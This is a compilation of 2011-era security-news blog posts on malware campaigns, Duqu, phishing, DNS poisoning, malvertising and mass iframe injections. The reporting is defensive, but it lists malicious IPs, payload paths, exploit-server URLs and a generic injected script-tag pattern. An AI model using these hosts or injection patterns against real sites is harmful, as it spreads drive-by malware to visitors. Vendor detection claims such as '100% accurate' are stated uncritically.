Cyber attack in Japan : Malware steals 3k confidential documents from farm ministry


In a suspected Cyber attack against the Japan, Foreign hackers might have compromised more than 3000  confidential data from the country's Ministry of Agriculture,Forestry and Fishery by infecting the ministry's system with a malware.

Investigators from the governemnt revealed that malware used in the suspected cyber-attack to be HTran, a connection bouncer program believed to have been developed by a Chinese hacker group around 2003, The report from The Daily Yomiuri says.

HTran is often used in cyber-attacks to steal information, as it can send data secretly.

"The programme was also used to steal data from the Finance Ministry, as HTran data transmissions were discovered to have taken place from October 2010 to November 2011" The report says.

Initially, the ministry did not inform the police, despite the fact that the intrusion fell under the Unauthorized Access Prohibition Law. However, now, the police have launched their own investigation to determine what information has been compromised.

Biggest Cyber attack in India's history, 10k Indian government emails hacked


Indian Government have suffered one of the biggest cyber attack in the country's history. Hackers managed to compromise more than 10,000 email address of top government officials.The attack occurred on July 12 this year.

The cybercriminals managed to steal email IDs belong to official working at the Prime Minister's office, Defence, external affairs, finance ministries and Intelligence agencies.

The attack occurred on July 12 this year, four days after the government was warned by the National Critical Information Infrastructure Protection Centre (NCIIPC).

According to Indian Express, News of the attack was confirmed by officials of intelligence and enforcement agencies at a day-long NCIIPC meeting in New Delhi this week.

#BatchWiper, a new data-wiping virus targets Iranian computers


Recently, The Iranian CERT reported that a new piece of malware targets Iranian computers that capable of wiping the files from the infected computers.

SophosLabs have analyzed the new sample and confirmed that the malware attempt to erase the contents of any files on D, E, F, G, H and I drives.

The malware is distributed as a self-extracting WinRAR archive called GrooveMonitor.exe that drops three executable files: juboot.exe, jucheck.exe and SLEEP.EXE.

The 'justboot.exe' is a DOS BAT file that has been converted to PE format that uses 'SLEEP.exe' to wait for few seconds before it adds a registry entry that ensures that 'jucheck.exe' is executed each time the computer restarted.

The primary function of the malware is wiping the files from hard drive, but it does so only within few specific date ranges, each about two days long.

After deleting the data , the malware runs chkdsk in order to trick the victim into believing that the files have been corrupted because of software or hardware failure.

ACH Bank Transfer Refusal Scam leads to Malware Attack

 MX Labs reports that they recently intercepted a lot of emails that warned internauts of certain banks that didn't accept payroll payments or transfers , this scam comes with malware attachement.

The Email Scam with following subject:
  • ACH debit transfer was hold by Yolo Community Bank
  • ACH payroll payment was not accepted by Central Trust and Savings Bank
  • ACH Transfer was not accepted by Eldorado Bank
  • ACH debit transfer was hold by The Mechanics Bank
  • Funds transfer was hold by our bank
They spoofed the email address and send the following message:
Dear Madam / Sir,

I regret to inform you that ACH payroll payment initiated by you or on your behalf was not accepted by Central Trust and Savings Bank.

Transaction ID: 17036653478735
Current status of transaction: on hold

Please review transaction details as soon as possible.

Theodore Parham
Payments Administration
Central Trust and Savings Bank

"review transaction details" link leads to malicious page.  The malicious site ask you to download the adobe flash player with pop up message.  The file is 233kb and named as "Flash.exe".  if you guessed, yes It is malware.

Kaspersky detect it as Trojan-Spy.Win32.Zbot.coak and McAfee detects it as Artemis!C5D161117328.



Several Windows registry changes will be exectued and the trojan can establish connection with the IP 64.252.17.231 on port 11760.

At the time of writing, only 12 of the 43 AV engines did detect the trojan at Virus Total.

Brazil ISP servers under DNS cache Poisoning attack , spreads Trojan


"Brazil ISP servers under massive DNS cache Poisoning attack"warns Kaspersky Lab expert Fabio Assolini.  When Brazilians try to visit facebook,google,youtube and othe websites, pop message asked to install Google Defence or some java applet in order to access the sites.

Some innocent peoples will install without knowing what problem will occur.  if you are the reader of EHN or Know about Security risks , you know what happen.  Yes, it will spread the banking Trojan. 

"Brazil has some big ISPs. Official statistics suggest the country has 73 million computers connected to the Internet, and the major ISPs average 3 or 4 million customers each. If a cybercriminal can change the DNS cache in just one server, the number of potential victims is huge," he points out.

According to Kaspersky, the same IP address hosted a number of malicious files and several exploits, and targeted users seem to be exclusively from Brazil.
80.XX.XX.198/Google_setup.exe
80.XX.XX.198/google_setup.exe
80.XX.XX.198/Google_Setup.exe
80.XX.XX.198/ad2.html
80.XX.XX.198/flash.jar
80.XX.XX.198/FaceBook_Complemento.exe
80.XX.XX.198/ad.html
134XX69350/AppletX.class
80.XX.XX.198/YouTube_Setup.exe
80.XX.XX.198/FlashPlayer.class
80.XX.XX.198/google2.exe
80.XX.XX.198/crossdomain.xml
80.XX.XX.198/favicon.ico
In fact the file ad.html is an encrypted script, exploiting CVE-2010-4452 and running arbitrary code in an old installation of JRE. The exploit detected by us as Exploit.Java.CVE-2010-4452.a calls up one of the files in this list.

Infecting peoples with DNS Poisoning attack is very easy because users believe their trusted sites. Cyber criminals paid an employee who has access to the DNS records to modify them so that user are redirected to the malicious site.

Assolini notes that last week the Brazilian police has arrested an employee of an ISP located in the south of the country, and that he stands accused of changing his employer's DNS cache and redirecting users to phishing websites - no doubt at the behest of the people running them. "We strongly suspect similar security breaches will be happening in other small and medium ISPs in the country," Assolini commented.

But random Internet users are not the only one who have been targeted by this type of attack. Employees of various companies have also been seeing similar pop-up windows when they tried to access any website. Once again, they were actually offered a banking Trojan for download.

The attack was made possible by flaws in the networking equipment used by their companies. Routers and modems were accessed remotely by attackers who changed the devices' DNS configurations.

Duqu is an upgraded version of Stars, Spyware that infected Iran


One of Best Antivirus firm ,Kaspersky enabled protection against the infamous Duqu worm.  Now it detects all version of Duqu.  Kaspersky's Developers Successfully updated the kaspersky to detect Trojan.Win32.Duqu and all other Trojans that exploit the CVE-2011-3402 vulnerability.

Recently, the Duqu Trojan became infamous that successfully exploit the Zero-Day Vulnerability. You can get more information about the malware here.

Following that, Organization start to give protection against the Duqu Trojan. NSS Labs released Anti-Duqu tool.

Also Microsoft issued a temporary fix for this vulnerability.

Duqu is Upgraded Version of "Stars" Malware in Iran:
The Research at Kaspersk's Lab unveils additional information about the Duqu worm.  As the result of their investigation, Duqu is first spotted as "Stars" Malware(a malware created to spy on Iran's nuclear system). 

April 2011(this year), Iran announced that they were under cyber attack with Malware named as "Stars" . Kaspersk researchers confirmed that some of the targets of Duqu were hit on April 21, using the same method involving CVE-2011-3402, a kernel level exploit in win32k.sys via embedded True Type Font (TTF) file.

According to analysis by IrCERT (Iran's Computer Emergency Response Team) Duqu is an upgraded version of "Stars".

Anti-Duqu available for free, 100% Accurate detection of Duqu


Duqu(similar to Stuxnet) is notorious worm that exploit Windows Zero-day Vulnerability.  Microsoft released temporary fix yesterday for this vulnerability .  NSS Labs claimed that they developed very accurate Duqu detection tool , available for free .

This tool detects all DuQu drivers installed on a system.  This tool was developed in the hopes that additional drivers can be discovered to allow us to learn more about the functionality, capabilities and ultimate purpose of DuQu.

According to the test, NSS tool Success rate is 100%, zero false positivies. Developers said it is using advanced pattern recognition techniques, it is also capable of detecting new drivers as they are discovered. 

Two new drivers were discovered after the tool was completed, and both were detected by the NSS tool with no updates required.
 

Zero-day Vulnerability in Windows Kernel exploited by Duqu worm


Zero-Day Vulnerability found in Windows Kernel by Researchers at the Cryptography and System Security (CrySyS) Lab, as the result of Analyzing the Duqu malware.  CrySys immediately reported to the Microsoft about the vulnerability.

CrySys discovered the Duqu Binaries and confirmed that it is nearly identical to Stuxnet.Thus far, no-one had been able to find the installer for the threat and therefore no-one had any idea how Duqu was initially infecting systems.

As the result of Research, CrySys found the installer as Microsoft word document file(.doc) that use a previously unknown kernel vulnerability.  When the .doc file is opened, the Duqu infects the system.

W32.Duqu is a worm that opens a back door and downloads more files on to the compromised computer. It also has rootkit functionality and may steal information from the compromised computer.

Duqu Infection:

"The Word document was crafted in such a way as to definitively target the intended receiving organization. Furthermore, the shell-code ensured that Duqu would only be installed during an eight-day window in August. Please note that this installer is the only installer to have been recovered at the time of writing—the attackers may have used other methods of infection in different organizations.", Symantec Report.

Once the system infected by Duqu, the attacker can control the system and infects other organization through the Social Engineering.  In one organization, evidence was found that showed the attackers commanding Duqu to spread across SMB shares.

Even though the system didn't have the ability to connect to the Internet , the Malware  configured such that to communicate with C&C Server using other infected system that has Internet connection.

Consequently, Duqu creates a bridge between the network's internal servers and the C&C server. This allowed the attackers to access Duqu infections in secure zones with the help of computers outside the secure zone being used as proxies.

Several Countries become the victim of this Duqu malware.  According to Symantec report, there are 8 countries infected by this malware.

As the result of Analysis, the researcher discovered that malware contacts a server hosted in India.

"Microsoft is collaborating with our partners to provide protections for a vulnerability used in targeted attempts to infect computers with the Duqu malware. We are working diligently to address this issue and will release a security update for customers through our security bulletin process," Jerry Bryant, group manager of response communications in Microsoft's Trustworthy Computing group said in a statement

updated whitepaper (version 1.3) from Symantec .

TimThumb vulnerability in Wordpress leads to malware infection

Last month, Thousands of Wordpress  sites infected by malware , discovered by Armorize. Avast Researchers investigate this hack and conclude that Blackhole exploit kit made by Russian Developers and available for $1500 in black market.

The Vulnerability in non-updated TimThumb allows attackers to upload and execute arbitrary PHP code in the TimThumb cache directory which will download other malicious files. But this is not the only way for example they use stolen passwords to direct FTP changes.

In your FTP, alongside other site files, a new file will appear that looks like this: ./wp-content/w3tc/min/a12ed303.925433.js or ./wp-includes/js/l10n.js

These scripts redirects to a new site where the Black Hole exploit kit is located. The victim is then served a JAR file, that will deploy other malicious downloads to the infected system.

source:
Avast

Cyber Criminals jailed 4 years for Stealing £3 million from bank accounts

 The ring leaders of Cyber criminal gang that siphoned nearly £3 million from the bank accounts were yesterday (Monday 31 October) jailed following an investigation by the Met's Police Central E-Crime Unit (PCeU)

Ukrainian nationals Yuriy Konovalenko aka Pavel Klikov (29 ys), and Yevhen Kulibaba (33 ys) were jailed for four years and eight months at Croydon Crown Court after previously pleading guilty to conspiracy to defraud.

This result is the culmination of a complex and protracted investigation by detectives from the Met's Police Central e-Crime Unit which has seen 13 people jailed for their part in a sophisticated international online fraud that attacked the heart of the UK banking industry.

The investigation, codenamed Operation Lath, focussed on the activities of a group responsible for conducting a systematic and highly sophisticated banking fraud which attacked the banking accounts of hundreds of online customers.

The fraud was perpetrated through the use of banking 'Trojans' to infect the personal computers of bank account holders and subsequently secure funds from them. The malicious software programme was able to capture confidential information, such as usernames, passwords and account numbers. These details were then used to access those accounts without the knowledge of the owners. Funds were then transferred to a large number of receiving accounts controlled by the group.

Kulibaba was the principal within this group of conspirators. He was based in the Ukraine and was responsible for obtaining and allocating accounts to be attacked, and organising the UK based conspirators to set up and operate recipient accounts and remove funds from them.

Konovolenko was Kulibaba's right hand man in the UK. He had a co-ordinating role, organising the establishment and operation of recipient accounts and instructing those with responsibility for organising the removal of the money out of the recipient accounts.

During the investigation the PCeU worked closely with UK banks and colleagues from the Crown Prosecution Service, the FBI and the US Department of Justice.

Report from met.police.uk 

Avira Antivirus detects itself as Malware | False Virus Definition File

Avira Antivirus labeled itself as Spyware.  Avira detects AESCRIPT.DLL(one of Avira dll file) as "TR/Spy.463227".
Recent Virus Definition File(VDF version 7.11.16.146 ) Update of Avira mistakenly includes AESCRIPT.DLL  Library file as one of Spyware.  This results in avira detects itself as spyware.   

After they come to know about this issue, Avira updated the Virus Definition File and ask users to update the Antivirus. The posted about this issue in their official Forum


Japanese parliament's computers infected by Virus, an Cyber Attack


Japanese Parliment's computers infected by virus .  This gave access to Hackers. They Steal Confidential Data belonging to 480 lawmakers and their staff, for over a month.

As per the Report their servers are infected after a Trojan Horse was emailed to a a Lower House member in July. This Trojan Horse downloaded malware from Chinese based Server. This malware Spy on Email Communication and Steal confidential Data of Lawmakers and send to the attacker.








Last month, Mistubishi(Japan's Biggest Defense Contractor) server compromised and confidential data stolen such as such as fighter jets, as well as nuclear power plant design and safety plans.

Tsunami backdoor Trojan Horse for Mac OS X, port of Troj/Kaiten


Sophos researchers discovered a new Trojan Horse named as "Tsunami" that infects Mac OS X.  Researchers said it appears to be a port of Troj/Kaiten( a Linux backdoor Trojan horse that once it has embedded itself on a computer system listens to an IRC channel for further instructions)

An attacker can get access to infected system and launch DDOS Attack(Distributed Denial of service).

Sophos Anti virus included this OSX/Tsunami-A in virus Definitions, So it can detect these malwares. Don't forget to update your Antivirus.


Mass Iframe injections used to drive traffic | Traffic Direction System[TDS]


Security Researchers of Sophos noticed the rise in the volume of Mal/Iframe-Gen detections. A Number of sites infected using the Iframe Injection technique. These infected sites are used to drive traffic to another websites(mostly malware sites).


Despite the obfuscation, Sophos products proactively block these malicious scripts as Mal/Iframe-Gen. As suggested from the threat name, the payload of the injected script is to write an iframe to the page:

The iframe points to what appears to be a 'middleman' server, used to bounce the traffic elsewhere. This is commonly known as a Traffic Direction System (TDS). The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required.

At first the Iframe Injection redirects to a freshly registered domain (hosted in Germany). However, the page was unavailable, with all requests getting a 404 error. This was a little surprising given that the attack was new (you expect 404s for old, stale attacks where the compromised sites persist long after the target payload servers have been shut down).

Later the TDS server was updated to redirect the traffic to a new destination. At the time of writing it is redirecting the traffic to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

The illustration below gives an overview of this attack, and the role that the TDS server plays in it.

This attack provides us with a perfect illustration of how user traffic is a commodity. Once they have injected numerous sites to redirect to their TDS, the attacker can essentially sell that user traffic to interested parties, willing to pay for victims to hit their exploit sites.

As ever, protection from this form of attack consists of several components:
  • detection of the malicious redirects injected into the legitimate sites (in this case, proactive detection as Mal/Iframe-Gen).
  • URL filtering to block requests to the TDS. Thus far, a few different servers are being used in these attacks.
  • URL filtering to block requests to the final destination servers.
  • detection of the exploit site itself (Mal/ExpJS-N) and the various malicious files it uses.
  • detection of the final payload (which will vary as the final destination server changes).
  • if all else has failed, runtime protection (HIPs) to catch the malicious payload running on the victim's machine.

Bloody photos of Gaddafi's death, A spam Mail leads to malware infection


Malware Attackers take advantage of The death of Libyan dictator Colonel Gaddafi to spread malwares.They have spammed out an attack posing as pictures of Gaddafi's death, tricking users into believing that they came from the AFP news agency and are being forwarded by a fellow internet user.





Spam Mail:



Subject: Fw: AFP Photo News: Bloody Photos: Libya dictator Moammar Gadhafi's Death

Message body:

Libya dictator Moammar Gadhafi's Death

Libyan dictator Moammar Gadhafi, the most wanted man in the world, has been killed, the country's rebel government claimed Oct. 20. The flamboyant tyrant who terrorized his country and much of the world during his 42 years of despotic rule was cornered by insurgents in the town of Sirte, where Gadhafi had been born and a stronghold of his supporters.

Attached file: Bloody Photos_Gadhafi_Death.rar
If windows users opened the attachement, it will lead to infection of your system.

Sophos anti-virus products detect the malware proactively as Mal/Behav-103.

Symantec AdVantage(Anti-Malvertising): Armorize and Symantec partnered and launched


Armorize Technologies(malware blog) and Symantec joined together to fight against Malvertisement. They launched a AdVantage(Anti-Malvertising) Technology, cloud based scanner to detect the malvertising(malware advertisement) in online.

“Malvertising poses a serious risk to online publishers and their customers, reputation and revenue. Highly publicized malvertising infections can damage the reputation of even the most trusted online sites. Symantec AdVantage will provide ad publishers the tools they need to protect their businesses by fighting back against these threats.”
– Fran Rosch, Vice President, Identity and Authentication Services, Symantec Corp.

 Symantec Advantage will scan, detect and report malvertising on websites by automatically alerting publishers and identifying the location of malicious advertisements so customers can remove malicious ads that may damage their business’ reputation. A real-time performance dashboard complements these automatic reports by providing essential insights. For example, Symantec AdVantage will enable customers to compare safe ads to malicious advertisements and discover how and when malvertising occurred by visually tracing and identifying the path and source of infected advertisements .

Symantec AdVantage is scheduled to be made available to publishers and ad networks through a free early access program beginning in November 2011.

The service will be available here:
http://advantage.symantec.com/

Reference:
Few days back, the famous site " KickAssTorrent(KAT.ph)" served malvertising, detected by Armorize.

KickAssTorrents(Kat.ph) infected and serving malware through Malvertising

A Famous Torrent website's(alexa Rank:321) KickAssTorrents(kat.ph) OpenX platform compromised, and served a fake antivirus "Security Sphere 2012" through malvertising(stands for malicious advertisement),detected by armorize.When the user click the ad, it will redirect to fake page. This page infects users without their knowledge.


Coincidentally, KickAss Torrents published a blog post on Oct 10th in response to the website being flagged by antivirus vendor Avast. In it they said:
===================
Our users that are using the Avast anti-virus might have noticed that KAT.ph suddenly became labeled as a dangerous website for users that are not logged in. We want to assure our users that KickassTorrents has no malware or viruses of any kind and it is absolutely safe to use our website. We already contacted Avast and currently we are trying to find and fix the cause of this problem. You will help us if you choose the "Report the file as a false positive" option if you get the alert.
===================

In another thread, KickAss Torrents said:

===================
Now what the hell does this error mean?
First of all, don't flip out, don't go post on the KAT site, post down here if you experience the same problem.
Secondly, report down here if you experience this error.
Thirdly, add kat.ph to the safe URLs in your AV.
And lastly, please go to this site and report the problem (Avast! users only):
Avast! forum thread
Back on topic. What is this error? Does error roughly means that your anti-virus software has found some bad code in an iFrame. This could be from the site itself, or from advertisements. An iFrame is a piece of code that allows you to do several things. Embedding something to your site is a good example.
I hope this topic helps a little and I certainly hope the error is going to be fixed now.
Q&A:
Q: OMFG IS KAT HACKED?
A: Nope, just some error.
Q: Is it really safe to visit KAT?
A: Yes, it is.
===================
KickAss Torrents also referred to this discussion thread on Avast's forum. At the end of the forum it appears that Avast has acknowledged that it was indeed a false positive and have addressed the issue:

===================
Hello,

It should be solved, if not let us know please.

Miroslav Jenšík
AVAST Software a.s.
===================

Well, that time it might have been a false positive from Avast, but this time the website is absolutely infecting its visitors, as seen in our video.


The attacker injected the malicious script using the following url:
http://ad.kat.ph/delivery/ajs.php?zoneid=4&target=_blank&charset=UTF-8&cb=95920847237&charset=UTF-8&loc=http%3A//www.kat.ph/§ion=1939940

At the time of detection , only 2 out of 42 detected the malware in virustotal analysis.

According to Armorize,this attacker is responsible for speedtest.net incident.

Using DynDNS domains for their exploit server. Domain names are auto-calculated using Javascript. The algorithm used generates a (predicable) different dyndns.tv domain name every hour, in the format of roboABCD.tv, where ABCD are characters with a fixed seed and incremented by one character every different UTC hour.

The new dyndns domain for the next hour is generated every hour precisely at minutes 2 to 5, so this may be done by an automated mechanism.

All generated domains resolve to a single IP: 184.22.224.154 (AS21788, United States Scranton Network Operations Center Inc), located in the US.

The domain: obama-president.com resolves to this IP and is serving the same exploit pack. This domain was registered on Aug 4th through an Russian registrar, 1'ST DOMAIN NAME SERVICE www.1dns.ru. At this time the domain resolved to an Netherlands IP 85.17.93.9. The domain started to resolve to 184.22.224.154 on Aug 23rd. This IP and the president-obama.com domain are both currently still up and working.

This video show how the users infected:



Another Mass IFrame Injection Attack |350,000 ASP sites infected

 Another Mass Iframe Injection Attack detected by armorize.com Researchers.  On july, They detected the Mass Iframe injection that infected the 90000 websites. Looks like this time the number of sites is increased.   350,000 websites infected by Malware.  Also they targeted the website that are developed using ASP.net.


As per the Google result, there is 180,000 websites infected by this Iframe injection attack. They targeted victims who use 6 particular language:English, German, French, Italian, Polish, and Breton in their websites.
If you want to check the list of Infected sites, then do google search as "http://jjghui.com/urchin.js".  Never click the website that return by google after this search.  It will launch the malware attack.

Malware Infection:
The Malicious scripts inserted inside the victims website causes the visiting browser to load an iframe first from www3.strongdefenseiz.in and then from www2.safetosecurity.rr.nu.
Multiple browser-based drive-by download exploits are served depending on the visiting browser.

When the user is redirected to the malware server, it will server to the visitors. The malware will be automatically installed without your knowledge. This is if they have outdated browsing platforms (browser or Adobe PDF or Adobe Flash or Java etc).

Currently, the 6 out of 43 antivirus vendors on VirusTotal can detect the dropped malware.

jjghui.com resolves to IP 146.185.248.3 (AS3999), which is in Russia. www3.strongdefenseiz.in resolves to 75.102.21.121 (AS36352), which is in the US and hosted by HostForWeb.com. www2.safetosecurity.rr.nu resolves to IP 67.208.74.71 (AS33597), which is in the US and hosted by InfoRelayOnlineSystems.

The dropped malware attempts to connect to: 65.98.83.115 (AS25653), which is in the US.


IFrame Injection:
They inserted the Iframe inside the webpage using the web application vulnerability. like this:
<script src="Link_to_malicious_script"></script>

This inserts the malicious javascript inside website.  This malicious script generates an iframe to www3.strongdefenseiz.in, which gives an HTTP 302 redirect to the exploit server at www2.safetosecurity.rr.

Security Tips from BreakTheSecurity.com to Web Masters:
If your site also infected, then delete all files from your server. I hope you have backup of your website contents. Install the Latest Antivirus in your system. Verify your code before uploading.

Malware Analyzer v3.3 Released ~Security Tools

 
Malware Analyser is a freeware tool to perform static and dynamic analysis of the malwares.

Features:
  • String based analysis for registry, API calls, IRC Commands, DLL’s called and VMAware.
  • Display detailed headers of PE with all its section details, import and export symbols etc.
  • On distros, can perform an ASCII dump of the PE along with other options (check –help argument).
  • For windows, it can generate various section of a PE : DOS Header, DOS Stub, PE File Header, Image Optional Header, Section Table, Data Directories, Sections
    ASCII dump on windows machine.
  • Code Analysis (disassembling)
  • Online malware checking (www.virustotal.com)
  • Check for Packer from the Database.
  • Tracer functionality: Can be used to identify
  • Anti-debugging Calls tricks, File system manipulations Calls Rootkit Hooks, Keyboard Hooks, DEP Setting Change, Network Identification traces.
  • Signature Creation: Allows to create signature of malware.
  • Batch Mode Scan to Scan all DLL and Exe in directories and sub-directories

Malware Analyzer v3.3 rleased.

Changelogs:

--Added Traces signatures
--Improved parsing
--Bug fixes

Online Virus Removal Sites infected by malwares , infects visitors machine


One of the online Virus removal website laptopvirusrepair.co.uk infected by malwares and serves malware to visitors system. This site offers to pick up your infected laptop, clean it and then ship it back to you for a fee.

It is an obfuscated iframe that redirects to a site that will deliver exploits: zdesestvareznezahodi.com/tds/go.php?sid=1
The site is listed in malwareblacklist website.



Before considering others laptop security, they must consider their server security.  Now the most of their users affected by malware.  Gaining their trust again is not so easy.